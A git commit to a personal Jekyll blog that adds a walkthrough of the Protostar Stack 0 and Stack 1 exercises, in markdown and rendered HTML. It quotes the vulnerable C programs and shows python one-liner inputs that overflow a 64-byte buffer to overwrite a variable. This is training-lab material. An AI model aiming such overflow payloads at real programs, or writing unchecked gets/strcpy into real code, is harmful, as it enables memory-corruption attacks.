From cabe6e07945132516ababd27ea791000d831bc24 Mon Sep 17 00:00:00 2001 From: Paul Walko Date: Wed, 15 Jun 2016 01:06:03 -0400 Subject: [PATCH] new site4 --- _config.yml | 14 +-- _includes/head_base.html | 9 ++ _includes/header.html | 2 +- _posts/2016-06-14-nebula_exploit_exercises.md | 94 +++++++++++++++- _site/404.html | 11 +- _site/about/index.html | 11 +- _site/category/index.html | 13 ++- _site/index.html | 13 ++- _site/sitemap.xml | 4 +- _site/tag/index.html | 17 ++- _site/writeup/nebula_exploit_exercises.html | 105 +++++++++++++++++- _site/writeup/test_post.html | 11 +- 12 files changed, 275 insertions(+), 29 deletions(-) diff --git a/_config.yml b/_config.yml index 8e18538..a537b6f 100644 --- a/_config.yml +++ b/_config.yml @@ -10,7 +10,8 @@ excerpt_separator: "[-----]" # mode: dev mode: product -url: http://paul.walko.org/ +url: https://paul.walko.org/ +enforce_ssl: paul.walko.org/ devurl: http://localhost:4000/ name: Paul Walko title: Paul Walko @@ -27,13 +28,9 @@ my: address: country: United States skills: - security: ["Wireshark", "IDA", "Ollydebug"] + security: ["Wireshark", "IDA", "GDB"] coding: ["C", "C++", "Python", "Java", "bash", "HTML"] - tools: ["Linux"] - -collections: - qqGroupGuide: - output: true + tools: ["Linux", "vim", "Arch Linux"] defaults: - scope: @@ -41,8 +38,5 @@ defaults: type: "posts" values: excerpt: "{{ page.content }} | slice: 0 300" - - scope: - path: "" - type: "qqGroupGuide" values: layout: markdownreader_bare diff --git a/_includes/head_base.html b/_includes/head_base.html index 388d642..4a68520 100755 --- a/_includes/head_base.html +++ b/_includes/head_base.html @@ -1,4 +1,9 @@ + @@ -29,6 +34,10 @@ + + + + diff --git a/_includes/header.html b/_includes/header.html index a398912..b1cb2b6 100755 --- a/_includes/header.html +++ b/_includes/header.html @@ -37,7 +37,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) diff --git a/_posts/2016-06-14-nebula_exploit_exercises.md b/_posts/2016-06-14-nebula_exploit_exercises.md index d7818a1..ad76001 100644 --- a/_posts/2016-06-14-nebula_exploit_exercises.md +++ b/_posts/2016-06-14-nebula_exploit_exercises.md @@ -1,7 +1,99 @@ --- -title: "Protostar Exploit Exercises Solutions 0-3" +title: "Protostar Exploit Exercises Solutions 0-1" layout: post category: writeup tags: [exploit-exercises, protostar, hacking] excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com" --- + +# Stack 0 + +Here's what we're given: + +``` +#include +#include +#include + +int main(int argc, char **argv) +{ + volatile int modified; + char buffer[64]; + + modified = 0; + gets(buffer); + + if(modified != 0) { + printf("you have changed the 'modified' variable\n"); + } else { + printf("Try again?\n"); + } +} +``` + + + +The first thing I took note of is the size of the `buffer`: 64 bytes. After that, the program inputs text for `buffer`, and then checks to see if you modified the `modified` variable. +I'm guessing if I put in a string longer than 64 bytes it will work. Let's see: + +``` +$ echo `python -c 'print "A"*64'` | ./stack0 +Try again? +``` + +That works as expected, now with 65 bytes: + +``` +$ echo `python -c 'print "A"*65'` | ./stack0 +you have changed the 'modified' variable +``` + +Solved! + +# Stack 1 + +Here's the code we're given: + +``` +#include +#include +#include +#include + +int main(int argc, char **argv) +{ + volatile int modified; + char buffer[64]; + + if(argc == 1) { + errx(1, "please specify an argument\n"); + } + + modified = 0; + strcpy(buffer, argv[1]); + + if(modified == 0x61626364) { + printf("you have correctly got the variable to the right value\n"); + } else { + printf("Try again, you got 0x%08x\n", modified); + } +} +``` + +Just like Stack 0, we're given a `buffer` array size 64 bytes and we're also asked to input the contents of it. Except it looks like modified has to equal `0x61626364` instead of just changing it like before. + +Keep in mind this is [little endian](https://en.wikipedia.org/wiki/Endianness), so I'll input the value in reverse order: + +``` +$ ./stack1 `python -c 'print "A"*64'` +Try again, you got 0x00000000 +``` + +That works as expected, now with the additional bytes: + +``` +$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'` +you have correctly got the variable to the right value +``` + +Woo! diff --git a/_site/404.html b/_site/404.html index 67fa96e..45c2839 100644 --- a/_site/404.html +++ b/_site/404.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) diff --git a/_site/about/index.html b/_site/about/index.html index 7b51473..e9d1dbb 100644 --- a/_site/about/index.html +++ b/_site/about/index.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) diff --git a/_site/category/index.html b/_site/category/index.html index 8f420c6..6c406ab 100644 --- a/_site/category/index.html +++ b/_site/category/index.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) @@ -139,7 +148,7 @@
-

Protostar Exploit Exercises Solutions 0-3

+

Protostar Exploit Exercises Solutions 0-1

  • exploit-exercises
    • diff --git a/_site/index.html b/_site/index.html index b4d75e5..4540ac1 100644 --- a/_site/index.html +++ b/_site/index.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) @@ -107,7 +116,7 @@
-

Protostar Exploit Exercises Solutions 0-3

+

Protostar Exploit Exercises Solutions 0-1

  • exploit-exercises
    • diff --git a/_site/sitemap.xml b/_site/sitemap.xml index 678044d..6c1a16b 100644 --- a/_site/sitemap.xml +++ b/_site/sitemap.xml @@ -6,13 +6,13 @@ http://paul.walko.org//writeup/nebula_exploit_exercises - 2016-06-15T00:02:53-04:00 + 2016-06-15T01:05:43-04:00 weekly http://paul.walko.org//writeup/test_post - 2016-06-15T00:02:53-04:00 + 2016-06-15T01:05:43-04:00 weekly diff --git a/_site/tag/index.html b/_site/tag/index.html index 0163fa2..ca5aa80 100644 --- a/_site/tag/index.html +++ b/_site/tag/index.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) @@ -167,7 +176,7 @@
-

Protostar Exploit Exercises Solutions 0-3

+

Protostar Exploit Exercises Solutions 0-1

  • exploit-exercises
    • @@ -330,7 +339,7 @@
-

Protostar Exploit Exercises Solutions 0-3

+

Protostar Exploit Exercises Solutions 0-1

  • exploit-exercises
    • @@ -425,7 +434,7 @@
-

Protostar Exploit Exercises Solutions 0-3

+

Protostar Exploit Exercises Solutions 0-1

  • exploit-exercises
    • diff --git a/_site/writeup/nebula_exploit_exercises.html b/_site/writeup/nebula_exploit_exercises.html index 53e27a2..6dcc691 100644 --- a/_site/writeup/nebula_exploit_exercises.html +++ b/_site/writeup/nebula_exploit_exercises.html @@ -5,11 +5,16 @@ + -Protostar Exploit Exercises Solutions 0-3 +Protostar Exploit Exercises Solutions 0-1 @@ -35,6 +40,10 @@ + + + + @@ -85,7 +94,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) @@ -100,7 +109,7 @@
    -

    Protostar Exploit Exercises Solutions 0-3

    +

    Protostar Exploit Exercises Solutions 0-1

      @@ -116,7 +125,95 @@
    - +

    Stack 0

    + +

    Here’s what we’re given:

    + +
    #include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main(int argc, char **argv)
+{
+  volatile int modified;
+  char buffer[64];
+
+  modified = 0;
+  gets(buffer);
+
+  if(modified != 0) {
+      printf("you have changed the 'modified' variable\n");
+  } else {
+      printf("Try again?\n");
+  }
+}
+
    +
    + +

    The first thing I took note of is the size of the buffer: 64 bytes. After that, the program inputs text for buffer, and then checks to see if you modified the modified variable. +I’m guessing if I put in a string longer than 64 bytes it will work. Let’s see:

    + +
    $ echo `python -c 'print "A"*64'` | ./stack0
+Try again?
+
    +
    + +

    That works as expected, now with 65 bytes:

    + +
    $  echo `python -c 'print "A"*65'` | ./stack0      
+you have changed the 'modified' variable
+
    +
    + +

    Solved!

    + +

    Stack 1

    + +

    Here’s the code we’re given:

    + +
    #include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+
+int main(int argc, char **argv)
+{
+  volatile int modified;
+  char buffer[64];
+
+  if(argc == 1) {
+      errx(1, "please specify an argument\n");
+  }
+
+  modified = 0;
+  strcpy(buffer, argv[1]);
+
+  if(modified == 0x61626364) {
+      printf("you have correctly got the variable to the right value\n");
+  } else {
+      printf("Try again, you got 0x%08x\n", modified);
+  }
+}
+
    +
    + +

    Just like Stack 0, we’re given a buffer array size 64 bytes and we’re also asked to input the contents of it. Except it looks like modified has to equal 0x61626364 instead of just changing it like before.

    + +

    Keep in mind this is little endian, so I’ll input the value in reverse order:

    + +
    $ ./stack1 `python -c 'print "A"*64'`
+Try again, you got 0x00000000
+
    +
    + +

    That works as expected, now with the additional bytes:

    + +
    $ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`    
+you have correctly got the variable to the right value
+
    +
    + +

    Woo!

    diff --git a/_site/writeup/test_post.html b/_site/writeup/test_post.html index 377f449..b9821e4 100644 --- a/_site/writeup/test_post.html +++ b/_site/writeup/test_post.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -85,7 +94,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) })